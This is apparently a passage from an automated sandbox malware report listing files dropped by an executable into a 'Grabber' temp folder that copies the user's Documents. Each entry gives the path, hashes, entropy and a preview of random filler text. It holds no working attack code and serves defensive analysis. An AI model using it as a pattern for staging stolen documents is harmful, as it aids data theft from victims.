Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\BNAGMGSPLO\BNAGMGSPLO.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\BNAGMGSPLO\DUUDTUBZFW.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\BNAGMGSPLO\EFOYFBOLXA.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\BNAGMGSPLO\EWZCVGNOWT.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\BNAGMGSPLO\JDDHMPCDUJ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
